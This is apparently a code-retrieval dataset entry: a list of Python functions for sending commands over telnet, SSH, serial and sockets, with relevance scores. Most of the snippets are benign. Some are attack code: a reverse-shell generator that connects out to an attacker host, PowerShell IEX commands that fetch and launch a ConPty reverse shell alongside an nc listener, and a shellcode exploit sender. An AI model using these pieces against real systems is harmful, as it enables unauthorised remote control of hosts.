#logger.debug(\"Output After Removing command: %s\" % self.last_output)\n\n #if not ignoreErrors and re.search(\"\\b:*(error|unable|failed|failure|unrecognized command):*\\b\", self.last_output, re.I):\n # logger.error(\"Error while executing command\")\n\n if cmd.startswith(\"hadoop\"):\n #logger.debug(\"Before removal: '%s'\" % self.last_output)\n self.last_output = re.sub(r\"(?m)^\\s*WARNING:.*$\", \"\", self.last_output)\n #logger.debug(\"After removal: '%s'\" % self.last_output)\n\n # Remove some special characters seen in new platforms (gingko onwards)\n #logger.debug(\"Output before removing special chars: %s\" % self.last_output)\n ret_val = remove_special(self.last_output)\n\n #logger.debug(\"Output after removing special chars: %s\" % ret_val)\n return ret_val.strip()", "def send_command_and_receive_response(command):\n\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n sock.connect('/tmp/socket_c_and_nc')\n data = 'No response'\n try:\n msg = command\n sock.sendall(str(len(msg)).zfill(10))\n sock.sendall(msg)\n #sendmsg(sock, str(len(msg)).zfill(10))\n #sendmsg(sock, msg)\n\n length = constants.recvall(sock, 10)\n #length = sock.recv(10)\n #log.debug(str(length))\n data = constants.recvall(sock, int(length))\n \n finally:\n sock.close()\n \n return data", "def reply(self, message):\n [command, argument] = message.split(\"\\n\")\n if command == \"deposit\":\n return self.deposit(argument)\n elif command == \"withdraw\":\n return self.withdraw(argument)\n elif command == \"balance\":\n return self.getBalance()\n elif command == \"logout\":\n return self.logout()\n else:\n return self.login(command, argument)", "def snarf(cmd):\n f=os.popen(cmd)\n result = f.readline()[:-1] # strip final newline\n f.close()\n return result", "async def telnet_send_command_with_unexpected_pattern(\n self, cmd, pattern, error_pattern=None, timeout=None\n ):\n\n # Debug info message\n log.info(\"telnet_send_command_with_unexpected_pattern\")\n\n # Default value of timeout variable\n if timeout is None:\n timeout = self.timeout\n\n # Add carriage return at the end of the command (mandatory to send the command)\n cmd = cmd + self._carriage_return_for_send_command\n\n # Sending command\n self._writer.write(cmd.encode())\n\n # Temporary string variable\n output = \"\"\n\n # Temporary bytes variable\n byte_data = b\"\"\n\n # By default pattern is not found\n 
pattern_not_found = True\n\n try:\n\n # Read data\n while pattern_not_found:\n\n # Read returned prompt\n byte_data += await asyncio.wait_for(\n self._reader.read(MAX_BUFFER_DATA), timeout=timeout\n )\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: byte_data: '{byte_data}'\"\n )\n\n # Display debug message\n log.debug(\n f\"telnet_send_command_with_unexpected_pattern: byte_data: hex: '{byte_data.hex()}'\"\n )\n\n # Temporary convertion in string. This string has the following form: \"b'....'\"\n output = str(byte_data)\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: output: '{output}'\"\n )\n\n # Is a pattern used?\n if pattern:\n\n # Check all pattern of prompt in the output\n for prompt in pattern:\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: checking prompt: '{prompt}'\"\n )\n\n # A pattern found?\n if prompt in output:\n\n # Yes\n\n # A pattern is found. The main loop can be stopped\n pattern_not_found = False\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: prompt found: '{prompt}'\"\n )\n\n # Leave the loop\n break\n\n # Is an unexpected pattern used?\n if error_pattern and pattern_not_found:\n\n # Check all unexpected pattern of prompt in the output\n for bad_prompt in error_pattern:\n\n # Display info message\n log.info(\n f\"telnet_send_command_with_unexpected_pattern: checking unexpected prompt: '{bad_prompt}'\"\n )\n\n # An error_pattern pattern found?\n if bad_prompt in output:\n\n # Yes\n\n # Display error message\n log.error(\n \"telnet_send_command_with_unexpected_pattern: authentication failed\"\n )\n\n # Raise exception\n raise Exception(\n \"telnet_send_command_with_unexpected_pattern: authentication failed\"\n )\n\n # Leave the loop\n # break\n\n except asyncio.TimeoutError:\n\n # Time out during when reading prompt\n\n # Close the connection in order to not display RuntimeError\n await self.disconnect()\n\n # Display error message\n log.error(\n \"telnet_send_command_with_unexpected_pattern: reading prompt: timeout\"\n )\n\n # Exception propagation\n raise\n\n except Exception as error:\n\n # Error during when reading prompt\n\n # Close the connection in order to not display RuntimeError\n await self.disconnect()\n\n # Display error message\n log.error(\n f\"telnet_send_command_with_unexpected_pattern: reading prompt: error: {error}\"\n )\n\n # Exception propagation\n raise\n\n # Convert data (bytes) into string\n output = byte_data.decode(\"utf-8\", \"ignore\")\n\n # Debug info message\n log.debug(\n f\"telnet_send_command_with_unexpected_pattern: raw output: '{output}'\\ntelnet_send_command_with_unexpected_pattern: raw output (hex): '{output.encode().hex()}'\"\n )\n\n # Remove the command sent from the result of the command\n output = self.remove_command_in_output(output, str(cmd))\n # Remove the carriage return of the output\n output = self.remove_starting_carriage_return_in_output(output)\n # Remove the ending prompt of the output\n output = self.remove_ending_prompt_in_output(output)\n\n # Debug info message\n log.debug(\n f\"telnet_send_command_with_unexpected_pattern: cleaned output: '{output}'\\ntelnet_send_command_with_unexpected_pattern: cleaned output (hex): '{output.encode().hex()}'\"\n )\n\n # Return the result of the command\n return output", "def execute(self, irc_c, msg, cmd):", "def send_recv_session(self, fillin):\n prompts = self.session_params[\"prompts\"]\n timeout = 
self.session_params[\"timeout\"]\n add_eol = self.session_params[\"add_eol\"]\n func = self.session_params[\"out_func\"]\n\n if fillin is not None:\n self.session.send(fillin.encode(\"utf-8\"))\n if add_eol and not fillin.endswith('\\n'):\n self.session.send(\"\\n\".encode(\"utf-8\"))\n\n buff = ''\n begin = time.perf_counter()\n while True:\n try:\n resp = self.session.recv(9999)\n except socket.timeout:\n resp = b\"\"\n dec = resp.decode(\"unicode_escape\")\n buff += dec\n for p in prompts:\n if buff.endswith(p):\n break\n if time.perf_counter() - begin > timeout:\n break\n\n return func(buff.replace(\"\\r\", \"\"))", "def get_prompt(self, timeout=30):\n #self.tc.expect(self.tool_prompt, timeout=timeout)\n #self.tf = self.tc.after.split()\n #return {'status': int(self.tf[self.tool_status_index]), 'output': self.tc.before}\n output = \"\"\n # Loop until we receive the special spt prompt while in pipe mode.\n while True:\n line = self.tc.stdout.readline()\n if re.search(self.tool_prompt, line):\n self.tf = line.split()\n break\n elif not len(line):\n # We've reached EOF or spt exited abnormally, usually a core dump!\n raise RuntimeError\n else:\n output += line\n #if self._debug:\n # print('Response: {0}'.format(self.tf))\n # print('Output: {0}'.format(output), end=None)\n #import pdb; pdb.set_trace()\n return {'status': int(self.tf[self.tool_status_index]), 'output': output}", "def send_exploit(ip: str, port: int) -> None:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((ip, port))\n sock.settimeout(5)\n sock.send(build_buf(add_shellcode()))\n try:\n print(sock.recv(1024))\n except socket.timeout:\n pass\n finally:\n sock.close()", "def connect(command):\r\n global CurrentState\r\n global CurrentInput\r\n global RESPONSEOPTIONS\r\n stateNum = \"\"\r\n for ltr in command:\r\n if ltr.isnumeric():\r\n stateNum += ltr\r\n try:\r\n target_state = getState(int(stateNum))\r\n if target_state != None:\r\n if RESPONSEOPTIONS != []:\r\n RESPONSEOPTIONS[0] = target_state\r\n else:\r\n RESPONSEOPTIONS.append(target_state)\r\n else:\r\n print(\"Could not find state\")\r\n except Exception as e:\r\n print(\"<<<Error: Connecting state failed>>>\",e)", "def _execute(self, message):\n logging.info(__name__ + ' : Send the following command to the device: %s' % message)\n self.visa_handle.write('@%s%s' % (self._number, message))\n sleep(70e-3) # wait for the device to be able to respond\n result = self._read()\n if result.find('?') >= 0:\n print(\"Error: Command %s not recognized\" % message)\n else:\n return result", "def read():\n print(command(\"R\"))", "def parseCommand(self, msg):\n if msg == \"\":\n return\n if self.interpreter.debug:\n print \"Modem::parseCommand: \", msg\n if(self.status == Modem.Status.KILL):\n return\n command = msg.split(Interpreter.SEPARATOR)\n if (len(command)==1):\n if (command[0] == 'OK'):\n return self.confirmedMyIstr()\n elif (len(command)==2):\n if (command[0] == 'error'):\n return self.error(int(command[1]))\n elif (len(command)==3):\n if (command[0] == 'send_file'):\n cmd2 = re.sub(\"[^0-9]\", \"\", command[2])\n return self.recvDataFile(command[1],int(cmd2),False)\n elif (command[0] == 'send_stream'):\n cmd2 = re.sub(\"[^0-9]\", \"\", command[2])\n return self.recvDataFile(command[1],int(cmd2),False)\n return self.reset_myself()", "def sendCmd(self,cmd):\n self.ser.write(cmd.encode()+END.encode())\n out = self.ser.readline()\n return out", "def show_commands(net_connect, hostname, password, command, data_file):\n # check if in enable mode\n 
print('\\n' + sep)\n print('==> Sending commands...')\n print(sep)\n # apply the command\n res = net_connect.send_command(command)\n print('\\n' + sep)\n print(res)\n print('\\n' + sep + '\\n')\n # write config to file\n print('\\n' + sep + '\\n')\n print('==> Appending command output data to file...')\n content = '\\n' + sep + '\\n' + hostname + ' : '+ command + '\\n' + sep + '\\n' + res + '\\n' + sep + '\\n'\n append_data_to_file(data_file, content, hostname)\n print('==> Exiting...')", "def login_aashell(self):\n flag = 0\n login_aashell = 'telnet 192.168.255.1 15007'\n aashell_prompt = 'AaShell>'\n\n self._current.write(login_aashell)\n self._current.read_until_regexp(aashell_prompt)\n flag = 1\n\n return flag", "def wait_for_command_execution(self, timeout=None, check_fun=None):\n if check_fun is None:\n def check_fun2(buf, whole_data):\n # TODO: expose via logging config entry\n if self.verbose_logger is not None:\n self.verbose_logger.debug(\"expecting '%s', got: '%s'\", self.shell_prompt, buf)\n\n return self.re_shell_prompt.search(whole_data)\n\n check_fun = check_fun2\n try:\n res = self.process_output(\n NetUtil.wait_for_socket_result(self.sock,\n check_fun,\n read_buf_size=SOCKET_READ_BUF_SIZE,\n timeout=timeout\n )\n )\n except NetUtil.Timeout as e:\n # netstat_uds = run_shell(\"netstat -ape -A unix\")\n # open_fds = run_shell('ls -l /proc/%s/fd/' % os.getpid())\n # lsof = run_shell('lsof -U')\n # debug:\n\n # Active Unix Domain Sockets:\n # %s.\n # Open file handles (Unix):\n # %s\n # lsof:\n # %s\n # % (netstat_uds, open_fds, lsof))\n # log exception to node log\n if self.brief_logger:\n self.brief_logger.exception(e)\n\n raise\n return res", "def getoutput(cmd):\n return getstatusoutput(cmd)[1]", "def get_python_code(self, badchars, localhost, localport):\n\n if not localhost or not localport:\n print \"Settings for connectback listener must be defined\"\n return False\n\n pythoncode = \"\"\n pythoncode += \"\"\"\n#!/usr/bin/python\nimport socket,subprocess\n\nHOST = 'LOCALHOST' # The remote host\nPORT = LOCALPORT # The same port as used by the server\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# connect to attacker machine\ns.connect((HOST, PORT))\n\n# send we are connected\ns.send('[*] Connection Established!')\n# start loop\nwhile 1:\n # recieve shell command\n data = s.recv(1024)\n print data\n\n # if its quit, then break out and close socket\n if data == 'quit' or data == 'q':\n break\n\n # do shell command\n proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n # read output\n stdout_value = proc.stdout.read() + proc.stderr.read()\n # send output to attacker\n s.send(stdout_value)\n# close socket\ns.close()\n\"\"\"\n\n pythoncode = pythoncode.replace(\"LOCALHOST\", str(localhost))\n pythoncode = pythoncode.replace(\"LOCALPORT\", str(localport))\n\n return pythoncode", "def run_at_command(self, cmd=\"AT\\r\", timeout=1000):\n self.__atresponse_received = False\n # Send command via serial\n if self._serport is None:\n raise StationException(\"Port \" + self.portname + \" is not open\")\n\n # Skip wireless packets\n self._atresponse = \"(\"\n # Send serial packet\n self._serport.send(cmd)\n \n # Wait for response from modem\n while len(self._atresponse) == 0 or self._atresponse[0] == '(':\n if not self._wait_for_response(timeout):\n return None\n # Return response received from gateway\n return self._atresponse", "def command(cmd: list, stdin: str):\n proc = Popen(cmd, stdout=PIPE, 
stderr=STDOUT, stdin=PIPE)\n out, err = proc.communicate(stdin.encode(\"utf-8\"))\n exit = proc.wait()\n return out.decode(\"utf-8\")", "async def _run_cmd(self, cmd, timeout=5):\n try:\n self._flush_buffer()\n self.pexpect_child.sendline(cmd)\n ret = self.pexpect_child.expect_exact(\n [self.cmd_prompt, pexpect.TIMEOUT], timeout=timeout\n )\n stdout = self.parse_cmd_output(self.pexpect_child.before) if ret == 0 else \"\"\n self.pexpect_child.sendline(\"echo $?\")\n ret = self.pexpect_child.expect_exact(\n [self.cmd_prompt, pexpect.TIMEOUT], timeout=timeout\n )\n exit_status = self.parse_cmd_output(self.pexpect_child.before) if ret == 0 else -1\n try:\n exit_status = int(exit_status)\n except ValueError:\n exit_status = -1\n return exit_status, stdout\n except Exception as e:\n self.applog.exception(\"Exception occured --> _run_command\", exc_info=e)\n raise", "def ssh_command(client, command):\n _stdin, _stdout, _stderr = client.exec_command(command, get_pty=True, timeout=60)\n _stdout.channel.recv_exit_status()\n return _stdout.readlines()", "def execute_ssh_command(self, command, password=\"\", username=\"root\", expected_return_code=\"0\"):\n try:\n print self._current.read()\n except:\n pass\n self._current.write(command)\n ret = self._current.read_until_regexp(self._current._prompt)\n\n #modify begin (chenjin 2012-06-25)\n #case failed for return code in lines[2] not lines[0] or lines[1]\n return_code_flag = \"return code is:\"\n return_code = 0\n self._current.write(\"echo %s$?\"%return_code_flag)\n raw_return_code = self._current.read_until_regexp(self._current._prompt)\n\n return_lines = raw_return_code.splitlines()\n## try:\n## return_code = int(return_lines[0])\n## except ValueError:\n## try:\n## return_code = int(return_lines[1])\n## except ValueError:\n## return_code = int(return_lines[2])\n\n for line in return_lines:\n if line.startswith(return_code_flag):\n return_code = int(line.lstrip(return_code_flag).strip())\n #modify end (chenjin 2012-06-25)\n\n if return_code != int(expected_return_code):\n raise RuntimeError(\"Command '%s' returned '%s' but '%s' was expected\"%(command, return_code,expected_return_code))\n return ret", "def send_receive(remote, shellcode):\n time.sleep(0.5)\n remote.send(shellcode)\n return struct.unpack('q', r.read(8))[0]", "def ask(self):\n subprocess.run([\"say\", \"-v\", \"Kyoko\", str(self.answer)])", "def client_connected(self, telnet_connection):", "def waitprompt(c):\n c.expect('\\n> ')\n time.sleep(0.1)", "def call_session_process(session, msg):\n # print(\"Send packet to session process\")\n session.fdp.send(msg)\n try:\n reply = session.fdp.recv()\n # print(\"Receive reply from session process\")\n if reply.header.mtype == MSG['OK']:\n return 0\n else:\n return -1\n except EOFError:\n return -1", "def send_command(command, timeout_time = set_err_codes.tcs_coms_timeout):\n\t\n\ttry:\n\t\t#Send the command to the TCS\t\n\t\toutput = subprocess.run(['ssh','wasp@tcs', command],\n\t\t\t\tcapture_output=True, timeout=timeout_time)\n\texcept subprocess.TimeoutExpired:\n\t\tlogger.critical('Failed to contact TCS')\n\telse:\n\t\tresponse = output.stdout\n\t\n\t#get rid of repeated command\n\tresponse = response.decode('utf-8')\n\tlogger.info('FROM TCS: '+response)\n\treturn response", "def Prompt(self):\n self.cli.context_was_set = not self.cli.config.context\n doc = self.cli.run()\n return doc.text if doc else None", "async def call_function(self, command, params=[]):\n data = bytearray(2 + len(params))\n data[0] = _HOSTTOPN532\n data[1] = command 
& 0xFF\n for i, val in enumerate(params):\n data[2+i] = val\n \n # Send the frame and read the response\n await self._write_frame(data)\n response = await self._read_frame()\n\n if len(response) < 2:\n raise RuntimeError('Received smaller than expected frame')\n \n if not(response[0] == _PN532TOHOST and response[1] == (command+1)):\n raise RuntimeError('Received unexpected command response!')\n \n # Return response data.\n return response[2:]", "def _rawshell(args):\n rows, cols = util.term_rows_cols()\n file = Config.V0_POWERSHELL_CONPTY()\n # Random port for temporary serv\n port = util.randport()\n psurl = httpserv.powershell_serv(args.address, str(port), file)\n pscmd = f\"IEX({psurl}); Invoke-ConPtyShell -RemoteIp {args.address} -RemotePort {args.port} -Rows {rows} -Cols {cols}\"\n remote_commands = [\n f\"powershell -nop -c {pscmd}\",\n f\"powershell -nop -e {powershell_base64_encode(pscmd)}\",\n ]\n lcmd = f\"stty raw -echo; (stty size; cat) | nc -lvnp {args.port}\"\n _print_remote(remote_commands)\n _print_local(lcmd)\n # small delay to allow the above stuff to finish before the raw terminal\n # makes stuff look wonky\n time.sleep(2)\n os.system(lcmd)\n # Reset the tty\n os.system(\"stty sane\")", "def state_cmd(self, byte):\n if byte in telnet_cmds:\n self.telnet_cmd.append(byte)\n if 251 <= byte <= 254:\n self.next_fn = self.state_option\n elif byte == 250:\n self.next_fn = self.state_sub\n else:\n self.handle_telnet_cmd(self.telnet_cmd)\n self.next_fn = self.state_text\n else:\n # unknown/invalid command\n self.next_fn = self.state_text", "def sdi_send_command_get_reply(cmd_to_send, sdi_bus=\"Port1\"):\n\n if sdi_bus_valid(sdi_bus):\n reply = command_line('!SDI {} {}'.format(sdi_bus, cmd_to_send), 128)\n if \"Got reply: \" in reply:\n reply = reply.replace(\"Got reply:\", \"\")\n else:\n raise Sdi12Error(\"No such bus\", sdi_bus)\n\n reply = reply.strip()\n return reply", "def __call__(self, session: Serial, callback=_process_result) -> list[str]:\n print(f\"Tx: {self.printable_command}\")\n s = session.write(self.command)\n session.write(self.command)\n sleep(self.default_timeout)\n in_waiting = session.in_waiting\n r = session.read(in_waiting)\n print(f\"Rx: {self.printable_bytestring(r)}\")\n r = callback(self, r)\n\n return r", "def _rc_get(self, cmd, buffersize=0):\n if not cmd.endswith('\\n'):\n cmd = cmd + '\\n'\n cmd = cmd.encode()\n self.SOCK.sendall(cmd)\n # allways read at least 2 bytes!\n answer = self.SOCK.recv(buffersize + 2)\n return answer.decode('utf-8').split('\\r\\n> ')[0]", "def get_answer_msg(self, resposta, cmd):\n\n # Busco na resposta o final do comando executado porque depois disso é o resultado desse comando\n caracters_to_match = cmd[len(cmd)-3:-1] # se o comando tiver menos que três caracteres vai ter problema\n len_carac_to_match = len(caracters_to_match)\n len_resp = len(resposta)\n pos_init = resposta.rfind(caracters_to_match, 0, len_resp-1)\n pos_fim = resposta.rfind(\"\\n\", 0, len_resp)\n\n r = resposta[pos_init + len_carac_to_match + 1: pos_fim] # aqui encontrado a resposta do comnado executad\n\n return r", "def telnet_login(\n self, username_pattern=r\"(?:user>)\", alt_prompt_term=r\"#\\s*$\", **kwargs\n ):\n self.TELNET_RETURN = self.RETURN\n return super().telnet_login(\n username_pattern=username_pattern,\n alt_prompt_terminator=alt_prompt_term,\n **kwargs\n )", "def input(self, prompt):\r\n return console_input(prompt)", "def execute(self, command):\n to_send = self.exploit_url + command\n to_send = URL(to_send)\n response = 
self._uri_opener.GET(to_send)\n return shell_handler.extract_result(response.get_body())", "def myrun(cmd):\n\tp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\tstdout = []\n\twhile True:\n\t\tline = p.stdout.readline()\n\t\tstdout.append(line)\n\t\t#print line\n\t\tph1 = line[9:19]\n\t\t#print (ph1)\n\t\tif ph1 == 'no carrier':\n\t\t\tmail(\"NOT WORKING\")\n\t\t\ttime.sleep(60)", "def send(self, cmd='AT\\r\\n', input=None): \n try:\n if input:\n data=[]\n #self.ser.write(\"AT+CMGW=\\\"\"+str(10)+\"\\\"\\r\\n\")\n self.ser.write(cmd+\"\\\"\"+str(10)+\"\\\"\\r\\n\")\n data.append(self.ser.readline().replace('\\r','').replace('\\n',''))\n time.sleep(.05)\n #self.ser.write(\"test Function\"+chr(26))\n self.ser.write(input+chr(26))\n data+=self.parse_data(self.ser.readlines())\n return data\n else: \n self.ser.flush()\n self.ser.write(cmd)\n self.timeout=0.1 #find min\n data=self.ser.readlines()\n return self.parse_data(data)\n\n except serial.serialutil.SerialException:\n if restart:\n print 'port disconnected'\n else:\n self.restart_serial()\n self.test_cmd(False,True)", "def command_shell(\n session_name,\n window_name,\n socket_name,\n socket_path,\n command,\n shell,\n use_pythonrc,\n use_vi_mode,\n):\n server = Server(socket_name=socket_name, socket_path=socket_path)\n\n util.raise_if_tmux_not_running(server=server)\n\n current_pane = util.get_current_pane(server=server)\n\n session = util.get_session(\n server=server, session_name=session_name, current_pane=current_pane\n )\n\n window = util.get_window(\n session=session, window_name=window_name, current_pane=current_pane\n )\n\n pane = util.get_pane(window=window, current_pane=current_pane) # NOQA: F841\n\n if command is not None:\n exec(command)\n else:\n if shell == \"pdb\" or (os.getenv(\"PYTHONBREAKPOINT\") and PY3 and PYMINOR >= 7):\n from tmuxp._compat import breakpoint as tmuxp_breakpoint\n\n tmuxp_breakpoint()\n return\n else:\n from ..shell import launch\n\n launch(\n shell=shell,\n use_pythonrc=use_pythonrc, # shell: code\n use_vi_mode=use_vi_mode, # shell: ptpython, ptipython\n # tmux environment / libtmux variables\n server=server,\n session=session,\n window=window,\n pane=pane,\n )", "def prompt(self):\n return input(self.message + \": \").strip()" ]
[ "0.70798624", "0.7071471", "0.70600575", "0.6706458", "0.6631486", "0.64974564", "0.6339306", "0.62638974", "0.6244074", "0.6220981", "0.60587776", "0.6056408", "0.60353273", "0.5993267", "0.5937854", "0.5930016", "0.59039897", "0.5903268", "0.58991635", "0.5847472", "0.58356094", "0.5806358", "0.5773433", "0.5756125", "0.5742472", "0.5703352", "0.56670576", "0.56666905", "0.5650056", "0.5649486", "0.5602105", "0.5572944", "0.5565549", "0.55436623", "0.5520593", "0.55016464", "0.54998773", "0.54845655", "0.54590535", "0.54464054", "0.54406214", "0.54346365", "0.540772", "0.53980577", "0.5389881", "0.5358399", "0.53547734", "0.5353078", "0.5352684", "0.53484905", "0.53280765", "0.5304719", "0.53033805", "0.53019315", "0.53006005", "0.5297266", "0.52935404", "0.52927536", "0.5285449", "0.52798927", "0.5278842", "0.5278717", "0.5278077", "0.527658", "0.5268394", "0.52659804", "0.52561074", "0.5251871", "0.52469766", "0.5244049", "0.52328336", "0.5227031", "0.5225536", "0.5225461", "0.52239966", "0.52217185", "0.5208106", "0.52047205", "0.5202862", "0.52017957", "0.51991534", "0.5192403", "0.5190125", "0.51794255", "0.51773995", "0.5174187", "0.51698905", "0.516304", "0.51585895", "0.51524425", "0.51460415", "0.5135739", "0.51295716", "0.5129109", "0.5127103", "0.5125552", "0.51214916", "0.5109753", "0.5101714", "0.50986737" ]
0.56606126
28
takes a telnet session, and a prompt
def wait(t,p):
    output_list = []
    c = ''
    d = ''
    while p not in d:
        c = t.read_very_eager()
        if len(c) > 0:
            d += c
            print c
            output_list.append(c)
            if "Press any key to continue" in c or "--More--" in c:
                t.write(" ")
    output_list = ((''.join(output_list)).replace('\r\n','\n')).split('\n')
    return output_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def telnet_run(self, cmd_list, prompt_usr='Username:', prompt_pwd='Password:', prompt_ena='>',\n prompt_conf=']', timeout=2, LOGIN_LOG=0):\n prompt_usr = prompt_usr.encode(\"ascii\")\n prompt_pwd = prompt_pwd.encode(\"ascii\")\n prompt_ena = prompt_ena.encode(\"ascii\")\n prompt_conf = prompt_conf.encode(\"ascii\")\n screen_buffer = {'host': self.host}\n log_sleep_time = 1\n output = ''\n try:\n tn = telnetlib.Telnet(self.host, port=23, timeout=1)\n except:\n screen_buffer = 'none'\n result = {'host': self.host, 'conn_type': 'telnet', 'result': 0, 'screen_buffer': screen_buffer}\n return result\n else:\n # login\n # username info\n if LOGIN_LOG:\n # time.sleep(log_sleep_time)\n output = output + tn.read_until(prompt_usr, timeout).decode('ascii')\n else:\n tn.read_until(prompt_usr, timeout)\n tn.write(self.usr.encode(\"ascii\") + b'\\n')\n # password info\n if self.pwd:\n if LOGIN_LOG:\n output = output + tn.read_until(prompt_pwd, timeout).decode('ascii')\n else:\n tn.read_until(prompt_pwd, timeout)\n tn.write(self.pwd.encode(\"ascii\") + b'\\n')\n else:\n tn.read_until(prompt_pwd, timeout)\n tn.write(b'\\n')\n # login info\n if LOGIN_LOG:\n # time.sleep(log_sleep_time)\n output = output + tn.read_until(prompt_ena, timeout).decode('ascii')\n else:\n tn.read_until(prompt_ena, timeout + 1)\n tn.write(b'\\n') # make the first command in prompt\n # run cmd_list\n for cmd in cmd_list:\n tn.write(cmd.encode(\"ascii\") + b'\\n')\n time.sleep(0.5)\n output = output + tn.read_very_eager().decode('ascii')\n # tn.read_until(prompt_conf, timeout)\n\n screen_buffer = output\n tn.close()\n\n result = {'host': self.host, 'conn_type': 'telnet', 'result': 1, 'screen_buffer': screen_buffer}\n return result", "def telnet(shell='/bin/bash'):\n assert(sys.stdin.isatty())\n c.setVerbose(False)\n\n # Open a PTY and spawn a bash connected to the slave end on the remote side\n code = 'import pty; pty.spawn([\\'{}\\', \\'-i\\'])'.format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...\n # Should maybe put some more functionality into the inline python code instead.\n\n # Save current TTY settings\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n\n # Put TTY into raw mode\n tty.setraw(sys.stdin)\n\n # Resize remote terminal\n # Nice-to-have: also handle terminal resize\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n') # terminal echo\n recvtil('READY\\r\\n') # command output\n\n interact()\n\n # Restore previous settings\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)", "def telnet_login(self, **kwargs):\n raise NotImplementedError", "def telnet():\r\n print('''\\n%s at %s acting as user %s\r\n\\nTelnet Service Menu''' % (PACKETMASTER.model, ADDRESS, USERNAME))\r\n choice = moves.input('''\r\n 1 - Get current Telnet status\r\n 2 - Enable or Disable Telnet service\r\n 3 - Back\r\n 4 - Quit \\n\r\n Enter selection number: ''')\r\n try:\r\n choice = int(choice)\r\n except ValueError as reason:\r\n print(\"That is not a valid selection.\", reason)\r\n telnet()\r\n execute = {1: PACKETMASTER.get_telnet,\r\n 2: PACKETMASTER.set_telnet_guided,\r\n 3: hardwareconfig,\r\n 4: exit}\r\n if choice in execute:\r\n try:\r\n select = execute[choice]\r\n run = select()\r\n print(run)\r\n telnet()\r\n except KeyError as reason:\r\n print(reason)\r\n else:\r\n print(\"That is not a valid 
selection.\")\r\n telnet()", "def telnet1(node):\n if len(node) == 2:\n # we received env and node name\n env = node[0]\n running = helpers.check_sim_running(env)\n node = node[1]\n elif len(node) == 1:\n # assume default env\n env = \"default\"\n running = helpers.check_sim_running(env)\n node = node[0]\n else:\n exit(call([get_command(), \"telnet\", \"--help\"]))\n\n if running:\n sim_name = running\n server = VIRLServer()\n details = server.get_sim_roster(sim_name)\n\n if node:\n try:\n node_dict = get_node_from_roster(node, details)\n node_name = node_dict.get(\"NodeName\")\n ip = node_dict[\"managementIP\"]\n proxy = node_dict.get(\"managementProxy\")\n\n # use user specified telnet command\n if \"VIRL_TELNET_COMMAND\" in server.config:\n cmd = server.config[\"VIRL_TELNET_COMMAND\"]\n cmd = cmd.format(host=ip)\n print(\"Calling user specified command: {}\".format(cmd))\n exit(call(cmd.split()))\n\n if proxy == \"lxc\":\n lxc = get_mgmt_lxc_ip(details)\n click.secho(\"Attemping telnet connection\" \" to {} at {} via ssh {}\".format(node_name, ip, lxc))\n cmd = 'ssh -t {}@{} \"telnet {}\"'\n cmd = cmd.format(server.user, lxc, ip)\n\n exit(call(cmd, shell=True))\n else:\n # handle the \"flat\" networking case\n click.secho(\"Attemping telnet connection\" \" to {} at {}\".format(node_name, ip))\n exit(call([\"telnet\", ip]))\n\n except AttributeError:\n click.secho(\"Could not find management info \" \"for {}:{}\".format(env, node), fg=\"red\")\n\n except KeyError:\n click.secho(\"Unknown node {}:{}\".format(env, node), fg=\"red\")\n else:\n return details.json()", "def __init__(self, prompt, ip_address, port):\n self._ip_address = ip_address\n self._port = int(port)\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._sock.connect((self._ip_address, self._port))\n self._prompt = prompt\n while True:\n reply = self._receive(False)\n if reply is not None:\n if to_str(reply) == self._prompt:\n break\n else:\n break", "def telnet(node):\n server = VIRLServer()\n client = get_cml_client(server)\n\n current_lab = get_current_lab()\n if current_lab:\n lab = safe_join_existing_lab(current_lab, client)\n if lab:\n try:\n node_obj = lab.get_node_by_label(node)\n except NodeNotFound:\n click.secho(\"Node {} was not found in lab {}\".format(node, current_lab), fg=\"red\")\n exit(1)\n\n if node_obj.is_active():\n mgmtip = get_node_mgmt_ip(node_obj)\n if mgmtip:\n if \"VIRL_TELNET_COMMAND\" in server.config:\n cmd = server.config[\"VIRL_TELNET_COMMAND\"]\n cmd = cmd.format(host=mgmtip)\n print(\"Calling user specified command: {}\".format(cmd))\n exit(call(cmd.split()))\n else:\n click.secho(\"Attemping telnet connection to {} at {}\".format(node_obj.label, mgmtip))\n\n exit(call([\"telnet\", mgmtip]))\n else:\n click.secho(\"Node {} does not have an external management IP\".format(node_obj.label))\n else:\n click.secho(\"Node {} is not active\".format(node_obj.label), fg=\"yellow\")\n else:\n click.secho(\"Unable to find lab {}\".format(current_lab), fg=\"red\")\n exit(1)\n else:\n click.secho(\"No current lab set\", fg=\"red\")\n exit(1)", "def telnet(self):\n self.log.info(\"connect-via-telnet\")\n telnet = distutils.spawn.find_executable(\"telnet\")\n os.execv(telnet, (\"telnet\", \"localhost\", str(self.qemu.monitor_port)))", "def telnet_console_port(self):\n logging.info('Telnet to console port with ip %s and port %s',self.console_ip, self.act_port)\n console = pexpect.spawn('telnet %s %s' % (self.console_ip, self.act_port))\n console.logfile = self.log\n 
